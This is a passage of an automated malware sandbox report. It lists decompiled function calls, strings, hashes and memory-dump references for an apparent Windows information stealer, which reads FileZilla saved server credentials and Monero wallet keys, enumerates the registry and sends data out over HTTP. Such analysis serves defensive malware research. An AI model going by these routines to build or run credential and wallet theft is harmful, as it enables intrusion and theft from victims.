Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 84c24abaa65c6814c81b7c4fe13741966d96ab3470e40422e50b63173d936ce3
Instruction ID: 8f2a61395a60be9986c89e8db258841f8f65550f89dceb58ab4779507191e2c2
Opcode Fuzzy Hash: 84c24abaa65c6814c81b7c4fe13741966d96ab3470e40422e50b63173d936ce3
Instruction Fuzzy Hash: 90D12171910208ABDB05FBF4DD96EEE777CAF68301F808419F142A60D1DFB5AA45CB61

Function 000F5100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 000F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000F4839
Part of subcall function 000F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000F4849

lstrlen.KERNEL32(00000000), ref: 000F5193

Part of subcall function 00108EA0: CryptBinaryToStringA.CRYPT32(00000000,000F5184,40000001,00000000,00000000,?,000F5184), ref: 00108EC0

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000F5207
StrCmpCA.SHLWAPI(?,00CDE928), ref: 000F5225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000F5340
HttpOpenRequestA.WININET(00000000,00CDE838,?,00CDDFC8,00000000,00000000,00400100,00000000), ref: 000F53A4

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,00CDE818,00000000,?,00CDA940,00000000,?,001119DC,00000000,?,001051CF), ref: 000F5737
lstrlen.KERNEL32(00000000), ref: 000F574B
GetProcessHeap.KERNEL32(00000000,?), ref: 000F575C
RtlAllocateHeap.NTDLL(00000000), ref: 000F5763
lstrlen.KERNEL32(00000000), ref: 000F5778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000F57A9
lstrlen.KERNEL32(00000000), ref: 000F57C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000F57E1
lstrlen.KERNEL32(00000000,?,?), ref: 000F580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000F5822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000F584D
InternetCloseHandle.WININET(00000000), ref: 000F58B1
InternetCloseHandle.WININET(00000000), ref: 000F58BE
InternetCloseHandle.WININET(00000000), ref: 000F58C8

Strings

", xrefs: 000F5706
------, xrefs: 000F54F9
------, xrefs: 000F5297
------, xrefs: 000F563B
------, xrefs: 000F53B7
", xrefs: 000F55C4
--, xrefs: 000F5280
", xrefs: 000F5482

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 837a7c892f5db8c9d8d6c60a66b4ac81b2a5de2bc6e933bf54ce22e6ea545893
Instruction ID: bc9b58f403ea618385cb014e30c0ba18f5813cdf308ce33a963e11f5d211ee24
Opcode Fuzzy Hash: 837a7c892f5db8c9d8d6c60a66b4ac81b2a5de2bc6e933bf54ce22e6ea545893
Instruction Fuzzy Hash: 7432F171920218ABDB15EBA0DC95FEEB37CBF64701F804159F186660D2EFB06A49CF52

Function 000FA790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0010AA70: StrCmpCA.SHLWAPI(00CD8F10,000FA7A7,?,000FA7A7,00CD8F10), ref: 0010AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000FAAC8
RtlAllocateHeap.NTDLL(00000000), ref: 000FAACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 000FABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000FA8B0

Part of subcall function 0010A820: lstrlen.KERNEL32(000F4F05,?,?,000F4F05,00110DDE), ref: 0010A82B
Part of subcall function 0010A820: lstrcpy.KERNEL32(00110DDE,00000000), ref: 0010A885

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

lstrcat.KERNEL32(?,00000000), ref: 000FACEB
lstrcat.KERNEL32(?,00111320), ref: 000FACFA
lstrcat.KERNEL32(?,00000000), ref: 000FAD0D
lstrcat.KERNEL32(?,00111324), ref: 000FAD1C
lstrcat.KERNEL32(?,00000000), ref: 000FAD2F
lstrcat.KERNEL32(?,00111328), ref: 000FAD3E
lstrcat.KERNEL32(?,00000000), ref: 000FAD51
lstrcat.KERNEL32(?,0011132C), ref: 000FAD60
lstrcat.KERNEL32(?,00000000), ref: 000FAD73
lstrcat.KERNEL32(?,00111330), ref: 000FAD82
lstrcat.KERNEL32(?,00000000), ref: 000FAD95
lstrcat.KERNEL32(?,00111334), ref: 000FADA4
lstrcat.KERNEL32(?,00000000), ref: 000FADB7
lstrlen.KERNEL32(?), ref: 000FAE0D
lstrlen.KERNEL32(?), ref: 000FAE1C

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

DeleteFileA.KERNEL32(00000000), ref: 000FAE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 000FABD4

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: 911ac3ace6f38b64f3428c0325d44fa7065d05cbac62e3fe28fc24367174e818
Instruction ID: 87c341346c8472bfdad0d0742ba12e40c011a5db0c2da2e2c6afe85627e7cfdd
Opcode Fuzzy Hash: 911ac3ace6f38b64f3428c0325d44fa7065d05cbac62e3fe28fc24367174e818
Instruction Fuzzy Hash: A4123171910208ABDB09FBA0DD96EEE737CBF24301F904159B547A60D1DF75AE09CBA2

Function 000F5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 000F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000F4839
Part of subcall function 000F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000F4849

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000F59F8
StrCmpCA.SHLWAPI(?,00CDE928), ref: 000F5A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000F5B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00CDE9C8,00000000,?,00CDA940,00000000,?,00111A1C), ref: 000F5E71
lstrlen.KERNEL32(00000000), ref: 000F5E82
GetProcessHeap.KERNEL32(00000000,?), ref: 000F5E93
RtlAllocateHeap.NTDLL(00000000), ref: 000F5E9A
lstrlen.KERNEL32(00000000), ref: 000F5EAF
lstrlen.KERNEL32(00000000), ref: 000F5ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000F5EF1
lstrlen.KERNEL32(00000000,?,?), ref: 000F5F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000F5F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 000F5F4C
InternetCloseHandle.WININET(00000000), ref: 000F5FB0
InternetCloseHandle.WININET(00000000), ref: 000F5FBD
HttpOpenRequestA.WININET(00000000,00CDE838,?,00CDDFC8,00000000,00000000,00400100,00000000), ref: 000F5BF8

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

InternetCloseHandle.WININET(00000000), ref: 000F5FC7

Strings

------, xrefs: 000F5D4C
", xrefs: 000F5E16
------, xrefs: 000F5A96
", xrefs: 000F5CD5
------, xrefs: 000F5C0B

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 0b8745deaf052796a68095d2e77b2a5c4535e32165b2bdef1296e4e455a679eb
Instruction ID: 7e376b6ca20a9aa01fd272d098c862a893cbc3070b29d8c63ce689ee18edb658
Opcode Fuzzy Hash: 0b8745deaf052796a68095d2e77b2a5c4535e32165b2bdef1296e4e455a679eb
Instruction Fuzzy Hash: 1C12FE71920218ABDB15EBA0DC95FEEB37CBF24701F9041A9B146630D1EFB06A49CF65

Function 000FCEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 00108B60: GetSystemTime.KERNEL32(00110E1A,00CDA8E0,001105AE,?,?,000F13F9,?,0000001A,00110E1A,00000000,?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 00108B86

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000FCF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000FD0C7
RtlAllocateHeap.NTDLL(00000000), ref: 000FD0CE
lstrcat.KERNEL32(?,00000000), ref: 000FD208
lstrcat.KERNEL32(?,00111478), ref: 000FD217
lstrcat.KERNEL32(?,00000000), ref: 000FD22A
lstrcat.KERNEL32(?,0011147C), ref: 000FD239
lstrcat.KERNEL32(?,00000000), ref: 000FD24C
lstrcat.KERNEL32(?,00111480), ref: 000FD25B
lstrcat.KERNEL32(?,00000000), ref: 000FD26E
lstrcat.KERNEL32(?,00111484), ref: 000FD27D
lstrcat.KERNEL32(?,00000000), ref: 000FD290
lstrcat.KERNEL32(?,00111488), ref: 000FD29F
lstrcat.KERNEL32(?,00000000), ref: 000FD2B2
lstrcat.KERNEL32(?,0011148C), ref: 000FD2C1
lstrcat.KERNEL32(?,00000000), ref: 000FD2D4
lstrcat.KERNEL32(?,00111490), ref: 000FD2E3

Part of subcall function 0010A820: lstrlen.KERNEL32(000F4F05,?,?,000F4F05,00110DDE), ref: 0010A82B
Part of subcall function 0010A820: lstrcpy.KERNEL32(00110DDE,00000000), ref: 0010A885

lstrlen.KERNEL32(?), ref: 000FD32A
lstrlen.KERNEL32(?), ref: 000FD339

Part of subcall function 0010AA70: StrCmpCA.SHLWAPI(00CD8F10,000FA7A7,?,000FA7A7,00CD8F10), ref: 0010AA8F

DeleteFileA.KERNEL32(00000000), ref: 000FD3B4

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 17d3fee905c357bed477783d4231aef6bce893d1da39764f23a987d536d67ac5
Instruction ID: fcde6c6b51312a6e6b24ee9ad98a74843a2a8818be0e00325247177e73794f56
Opcode Fuzzy Hash: 17d3fee905c357bed477783d4231aef6bce893d1da39764f23a987d536d67ac5
Instruction Fuzzy Hash: E7E10D71910208ABCB05EBA0DD96EEE777CBF24301F904159F187A70D1DF75AA09CBA2

Function 00108320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

RegOpenKeyExA.KERNEL32(00000000,00CDB428,00000000,00020019,00000000,001105B6), ref: 001083A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00108426
wsprintfA.USER32 ref: 00108459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0010847B
RegCloseKey.ADVAPI32(00000000), ref: 0010848C
RegCloseKey.ADVAPI32(00000000), ref: 00108499

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Strings

?, xrefs: 0010837A
- , xrefs: 001085A3
%s\%s, xrefs: 0010844D

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
